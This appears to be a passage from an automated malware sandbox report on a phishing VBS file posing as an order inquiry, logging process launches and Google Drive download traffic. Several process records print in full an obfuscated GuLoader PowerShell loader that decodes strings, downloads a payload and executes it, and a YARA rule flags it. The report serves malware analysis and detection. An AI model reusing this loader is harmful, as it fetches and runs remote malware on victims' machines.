            Data Ascii: ysLPA7FCPgZTy3qveDu5xBzrMFeQOrvCKrZ6xCU76ntyPcuSpMpDTvIVOjMBpR6xpPplbBINOjN9GYKBrAK+uVrV7orVZX2hUKem1qGCL6azh9YxXjmW4rSZmdKFgR+Nik9P6mavC7kVRuKUm0RzRn66VZqBsYtDyxyYOA9oJ0vGMohfQ75JuzPfQgSJUQYKjbxzX5SVPc6jgmkxnsuyB0d1CVhoTyh5zNOK9HaMj0IHYJnVisBLjA+nuARDvni


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            3 | 192.168.2.4 | 49739 | 142.250.185.110 | 443 | 7172 | C:\Program Files (x86)\Windows Mail\wabmig.exe
            Timestamp | Bytes transferred | Direction | Data
            2024-09-16 12:45:47 UTC | 216 | OUT | GET /uc?export=download&id=1PuWtbu-uhB53y-WA99iWotEHLsyMU2wV HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Host: drive.google.com
            Cache-Control: no-cache
            2024-09-16 12:45:47 UTC | 1610 | IN | HTTP/1.1 303 See Other
            Content-Type: application/binary
            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
            Pragma: no-cache
            Expires: Mon, 01 Jan 1990 00:00:00 GMT
            Date: Mon, 16 Sep 2024 12:45:47 GMT
            Location: https://drive.usercontent.google.com/download?id=1PuWtbu-uhB53y-WA99iWotEHLsyMU2wV&export=download
            Strict-Transport-Security: max-age=31536000
            Cross-Origin-Opener-Policy: same-origin
            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
            Content-Security-Policy: script-src 'nonce-6aakWSraa3uCab8-GFJD0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
            Server: ESF
            Content-Length: 0
            X-XSS-Protection: 0
            X-Frame-Options: SAMEORIGIN
            X-Content-Type-Options: nosniff
            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
            Connection: close


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            4 | 192.168.2.4 | 49740 | 142.250.185.193 | 443 | 7172 | C:\Program Files (x86)\Windows Mail\wabmig.exe
            Timestamp | Bytes transferred | Direction | Data
            2024-09-16 12:45:48 UTC | 258 | OUT | GET /download?id=1PuWtbu-uhB53y-WA99iWotEHLsyMU2wV&export=download HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Cache-Control: no-cache
            Host: drive.usercontent.google.com
            Connection: Keep-Alive
            2024-09-16 12:45:51 UTC | 4845 | IN | HTTP/1.1 200 OK
            Content-Type: application/octet-stream
            Content-Security-Policy: sandbox
            Content-Security-Policy: default-src 'none'
            Content-Security-Policy: frame-ancestors 'none'
            X-Content-Security-Policy: sandbox
            Cross-Origin-Opener-Policy: same-origin
            Cross-Origin-Embedder-Policy: require-corp
            Cross-Origin-Resource-Policy: same-site
            X-Content-Type-Options: nosniff
            Content-Disposition: attachment; filename="yGVpa170.bin"
            Access-Control-Allow-Origin: *
            Access-Control-Allow-Credentials: false
            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
            Accept-Ranges: bytes
            Content-Length: 287296
            Last-Modified: Sun, 15 Sep 2024 20:45:59 GMT
            X-GUploader-UploadID: AD-8ljv3soFYlXofWKXBjc_-gToAQEZI5I07Md2_3V7S2b7EVlU4MSg11azMu_5qPWbZNQ6FnOY
            Date: Mon, 16 Sep 2024 12:45:50 GMT
            Expires: Mon, 16 Sep 2024 12:45:50 GMT
            Cache-Control: private, max-age=0
            X-Goog-Hash: crc32c=lnh0Rg==
            Server: UploadServer
            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
            Connection: close


            Target ID:0
            Start time:08:44:57
            Start date:16/09/2024
            Path:C:\Windows\System32\wscript.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry RFQ #278823_pdf.vbs"
            Imagebase:0x7ff6bad30000
            File size:170'496 bytes
            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:1
            Start time:08:45:00
            Start date:16/09/2024
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. 
Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaModcGeor .eoBorrta hPioiGlanUnau Cas En2R p1 Op8Br.. 
,uDElsoComw,tbnRe lskaoscraVandKinFOppiOx,lAfteTra( De$WalOV.jvChae.esrRelcBa.oJacnsysf oniAcidstueDubnPlocFoyeNonsBha,sea$fo GFrsl Noo.istAnftpriiAluc Eg1,ed)H.r ';$Glottic1=$Rvepelsene[0];Brdnidens (Bisulc 'Arb$ olGDimlTndOEs.bMela IllGei:sans.orkElerPopmM.adTidE,orsAkeIA wgRemNescsTa.= sk(D st ndeG ssBa tCiv- PaPKona FrT,nbHAut Fic$Ir.gTa LTriO.onTBliT DuiBevCDor1J,n) or ');while (!$skrmdesigns) {Brdnidens (Bisulc 'Th.$Hslg DolH.bo rob F.a aulskr:Un DAp r,nseLeanNitg.mleKosaWaraswir OueKrenBodeRec=Wak$ mtVldr slu steDr, ') ;Brdnidens $Kardinalen;Brdnidens (Bisulc ' nesLait GeaVarr BetTea-Pa,s smlU pe.haeGe.pT n Ph,4Pse ');Brdnidens (Bisulc ',ro$PsegNonl egospab sua ,clDok: OusNe kOceraffm F,dUdde HesKn iBdrgUn.nEsbsska=squ(D lTslaelegsMutt ,e- aPs.eaGemtTenhPri An$OutG islPreo Tit OrtUn.iUnbcTor1Dri)Pre ') ;Brdnidens (Bisulc 'Evo$Bo gDislnazoH,nbswaaDi.l.fs:Eu RUnme oudKliiUnbvWatiLe,d.esi hn A gKn =Jah$ BlgCurlLysoDelbOdoaBesl o:FllKHeniPatkDe,rs at fsExo+F i+Ene% Ol$BryLYn gL ne redFiloklymNorm Noe .nnAissDef.OpkcGetoBeduTron st tr ') ;$Overconfidences=$Lgedommens[$Redividing];}$Disingenious=336954;$Rygte=27292;Brdnidens (Bisulc 'Anp$Unsg DalAptoT rb H.a olKol:PreTsunaBusrstessoto tvnAlneD xm roistudPhy Me = I s,aGH ge Det Du-kerC Isosupnsa,tsaseCron emtBr Hi$ aGom lA,bo ptHe tKaniKoncDek1Tot ');Brdnidens (Bisulc 'Unv$Covg U l .nostobEngaManl ko: soTFulu,mgmBanl eee enInd Cal=Ung str[ evs PryUnfsRevtspeePr m or.DevCP,oo lenKaev ,ees,drUnstC o]Hip:s p:UngFFunr Hao nemPh.BO.eas assnies.b6Bar4 HysWantDolrTakiFa n,xhgVic( Mi$PotT OvaRu,rkonsPr,o .anE oesudmsdeiFn d Ch)Cyr ');Brdnidens (Bisulc ' so$UnrgRealLamoansb R,a Felbr,:ResbUdrostal sqcAsohPireKolrB onDiseTjrs ,e Pre= C, Ov[ Gas.usyPhos s toveeOr.m sc.Cy TPire,idxGratsu .Me,E Mensa c stoUd.d s,i,renFregDou]B,y:Cha:GevA Eks KlC hnICouI Un.PedG,paeIn t FrsGutt InrCoui T n,gagTea(O,e$ra T DeuKlvm.ynlOmse scn Pa)pho ');Brdnidens (Bisulc '.al$ChogsonlRepoIllbJeta ilsch:LakC E,cPr iT,ilHeliLuduBivs.an=Mag$ RabC 
noWablsafcskrhTameFadrTecnUn e AlsTor.AyosAdduPr bGrasZeatA.lrPlaib.nnFrogGem(Ban$CalD niRygsFi,is pnHa,gRobeEndnReiiNo.oDeduFrasNer,Bir$JusRbliy amgb otToxeCon)syn ');Brdnidens $Ccilius;"
            Imagebase:0x7ff788560000
            File size:452'608 bytes
            MD5 hash:04029E121A0CFA5991749937DD22A1D9
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.2387730069.000001F2AF194000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Reputation:high
            Has exited:true

            Target ID:2
            Start time:08:45:00
            Start date:16/09/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7699e0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:3
            Start time:08:45:03
            Start date:16/09/2024
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ildprve.Fok && echo t"
            Imagebase:0x7ff72dbc0000
            File size:289'792 bytes
            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:5
            Start time:08:45:18
            Start date:16/09/2024
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. 
Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaModcGeor .eoBorrta hPioiGlanUnau Cas En2R p1 Op8Br.. 
,uDElsoComw,tbnRe lskaoscraVandKinFOppiOx,lAfteTra( De$WalOV.jvChae.esrRelcBa.oJacnsysf oniAcidstueDubnPlocFoyeNonsBha,sea$fo GFrsl Noo.istAnftpriiAluc Eg1,ed)H.r ';$Glottic1=$Rvepelsene[0];Brdnidens (Bisulc 'Arb$ olGDimlTndOEs.bMela IllGei:sans.orkElerPopmM.adTidE,orsAkeIA wgRemNescsTa.= sk(D st ndeG ssBa tCiv- PaPKona FrT,nbHAut Fic$Ir.gTa LTriO.onTBliT DuiBevCDor1J,n) or ');while (!$skrmdesigns) {Brdnidens (Bisulc 'Th.$Hslg DolH.bo rob F.a aulskr:Un DAp r,nseLeanNitg.mleKosaWaraswir OueKrenBodeRec=Wak$ mtVldr slu steDr, ') ;Brdnidens $Kardinalen;Brdnidens (Bisulc ' nesLait GeaVarr BetTea-Pa,s smlU pe.haeGe.pT n Ph,4Pse ');Brdnidens (Bisulc ',ro$PsegNonl egospab sua ,clDok: OusNe kOceraffm F,dUdde HesKn iBdrgUn.nEsbsska=squ(D lTslaelegsMutt ,e- aPs.eaGemtTenhPri An$OutG islPreo Tit OrtUn.iUnbcTor1Dri)Pre ') ;Brdnidens (Bisulc 'Evo$Bo gDislnazoH,nbswaaDi.l.fs:Eu RUnme oudKliiUnbvWatiLe,d.esi hn A gKn =Jah$ BlgCurlLysoDelbOdoaBesl o:FllKHeniPatkDe,rs at fsExo+F i+Ene% Ol$BryLYn gL ne redFiloklymNorm Noe .nnAissDef.OpkcGetoBeduTron st tr ') ;$Overconfidences=$Lgedommens[$Redividing];}$Disingenious=336954;$Rygte=27292;Brdnidens (Bisulc 'Anp$Unsg DalAptoT rb H.a olKol:PreTsunaBusrstessoto tvnAlneD xm roistudPhy Me = I s,aGH ge Det Du-kerC Isosupnsa,tsaseCron emtBr Hi$ aGom lA,bo ptHe tKaniKoncDek1Tot ');Brdnidens (Bisulc 'Unv$Covg U l .nostobEngaManl ko: soTFulu,mgmBanl eee enInd Cal=Ung str[ evs PryUnfsRevtspeePr m or.DevCP,oo lenKaev ,ees,drUnstC o]Hip:s p:UngFFunr Hao nemPh.BO.eas assnies.b6Bar4 HysWantDolrTakiFa n,xhgVic( Mi$PotT OvaRu,rkonsPr,o .anE oesudmsdeiFn d Ch)Cyr ');Brdnidens (Bisulc ' so$UnrgRealLamoansb R,a Felbr,:ResbUdrostal sqcAsohPireKolrB onDiseTjrs ,e Pre= C, Ov[ Gas.usyPhos s toveeOr.m sc.Cy TPire,idxGratsu .Me,E Mensa c stoUd.d s,i,renFregDou]B,y:Cha:GevA Eks KlC hnICouI Un.PedG,paeIn t FrsGutt InrCoui T n,gagTea(O,e$ra T DeuKlvm.ynlOmse scn Pa)pho ');Brdnidens (Bisulc '.al$ChogsonlRepoIllbJeta ilsch:LakC E,cPr iT,ilHeliLuduBivs.an=Mag$ RabC 
noWablsafcskrhTameFadrTecnUn e AlsTor.AyosAdduPr bGrasZeatA.lrPlaib.nnFrogGem(Ban$CalD niRygsFi,is pnHa,gRobeEndnReiiNo.oDeduFrasNer,Bir$JusRbliy amgb otToxeCon)syn ');Brdnidens $Ccilius;"
            Imagebase:0x7ff72dbc0000
            File size:289'792 bytes
            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:6
            Start time:08:45:18
            Start date:16/09/2024
            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. 
Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaModcGeor .eoBorrta hPioiGlanUnau Cas En2R p1 Op8Br.. 
,uDElsoComw,tbnRe lskaoscraVandKinFOppiOx,lAfteTra( De$WalOV.jvChae.esrRelcBa.oJacnsysf oniAcidstueDubnPlocFoyeNonsBha,sea$fo GFrsl Noo.istAnftpriiAluc Eg1,ed)H.r ';$Glottic1=$Rvepelsene[0];Brdnidens (Bisulc 'Arb$ olGDimlTndOEs.bMela IllGei:sans.orkElerPopmM.adTidE,orsAkeIA wgRemNescsTa.= sk(D st ndeG ssBa tCiv- PaPKona FrT,nbHAut Fic$Ir.gTa LTriO.onTBliT DuiBevCDor1J,n) or ');while (!$skrmdesigns) {Brdnidens (Bisulc 'Th.$Hslg DolH.bo rob F.a aulskr:Un DAp r,nseLeanNitg.mleKosaWaraswir OueKrenBodeRec=Wak$ mtVldr slu steDr, ') ;Brdnidens $Kardinalen;Brdnidens (Bisulc ' nesLait GeaVarr BetTea-Pa,s smlU pe.haeGe.pT n Ph,4Pse ');Brdnidens (Bisulc ',ro$PsegNonl egospab sua ,clDok: OusNe kOceraffm F,dUdde HesKn iBdrgUn.nEsbsska=squ(D lTslaelegsMutt ,e- aPs.eaGemtTenhPri An$OutG islPreo Tit OrtUn.iUnbcTor1Dri)Pre ') ;Brdnidens (Bisulc 'Evo$Bo gDislnazoH,nbswaaDi.l.fs:Eu RUnme oudKliiUnbvWatiLe,d.esi hn A gKn =Jah$ BlgCurlLysoDelbOdoaBesl o:FllKHeniPatkDe,rs at fsExo+F i+Ene% Ol$BryLYn gL ne redFiloklymNorm Noe .nnAissDef.OpkcGetoBeduTron st tr ') ;$Overconfidences=$Lgedommens[$Redividing];}$Disingenious=336954;$Rygte=27292;Brdnidens (Bisulc 'Anp$Unsg DalAptoT rb H.a olKol:PreTsunaBusrstessoto tvnAlneD xm roistudPhy Me = I s,aGH ge Det Du-kerC Isosupnsa,tsaseCron emtBr Hi$ aGom lA,bo ptHe tKaniKoncDek1Tot ');Brdnidens (Bisulc 'Unv$Covg U l .nostobEngaManl ko: soTFulu,mgmBanl eee enInd Cal=Ung str[ evs PryUnfsRevtspeePr m or.DevCP,oo lenKaev ,ees,drUnstC o]Hip:s p:UngFFunr Hao nemPh.BO.eas assnies.b6Bar4 HysWantDolrTakiFa n,xhgVic( Mi$PotT OvaRu,rkonsPr,o .anE oesudmsdeiFn d Ch)Cyr ');Brdnidens (Bisulc ' so$UnrgRealLamoansb R,a Felbr,:ResbUdrostal sqcAsohPireKolrB onDiseTjrs ,e Pre= C, Ov[ Gas.usyPhos s toveeOr.m sc.Cy TPire,idxGratsu .Me,E Mensa c stoUd.d s,i,renFregDou]B,y:Cha:GevA Eks KlC hnICouI Un.PedG,paeIn t FrsGutt InrCoui T n,gagTea(O,e$ra T DeuKlvm.ynlOmse scn Pa)pho ');Brdnidens (Bisulc '.al$ChogsonlRepoIllbJeta ilsch:LakC E,cPr iT,ilHeliLuduBivs.an=Mag$ RabC 
